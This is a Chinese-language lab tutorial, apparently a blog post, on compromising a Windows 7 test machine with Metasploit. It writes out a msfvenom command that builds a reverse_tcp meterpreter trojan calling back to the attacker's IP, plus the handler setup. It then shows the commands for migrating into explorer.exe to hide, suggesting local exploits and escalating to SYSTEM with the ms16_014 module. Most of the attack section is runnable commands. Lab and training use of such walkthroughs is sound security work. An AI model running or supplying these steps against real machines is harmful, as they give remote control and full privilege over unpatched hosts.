利用msf实现windows的上线与提权

环境部署

攻击机:Kali ip:192.168.208.138
靶机:Win7(x64) ip:192.168.208.142

Payload (因为是靶机测试,可以在Kali开启apache2服务或者使用WinSCP将木马传入目标靶机,方便后面监听)

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.208.138 LPORT=6666 -f exe > reverse.exe

开启监听

use exploit/multi/handler

设置payload

set payload windows/x64/meterpreter/reverse_tcp

设置lhost

set lhost 192.168.208.138

设置lport

set lport 6666

然后运行

exploit

在Win7靶机打开传入的木马,Kali成功上线!
利用msf实现windows的上线与提权_第1张图片
上线后进行进程迁移(隐藏自己),把进程迁移到explore.exe中,1844为进程的pid

migrate 1844

输入指令查看当前用户权限
在这里插入图片描述

攻击提权

system为Win7最高权限,开始提权!
首先输入background命令将session放到后台
在这里插入图片描述
然后开始执行攻击模块,探索系统存在的漏洞(未修补)

use post/multi/recon/local_exploit_suggester

在这里插入图片描述
将后台的session 1 会话拿出来,执行exp
利用msf实现windows的上线与提权_第2张图片
在探测出的系统漏洞中选择攻击模块进行提权

set session 1
use exploit/windows/local/ms16_014_wmi_recv_notif
exploit

在这里插入图片描述

利用msf实现windows的上线与提权_第3张图片

成功提权

通过返回信息说明攻击成功,并返回shell,输入指令查看当前用户权限,发现是system,提权成功!
在这里插入图片描述

你可能感兴趣的:(安全,windows,kali)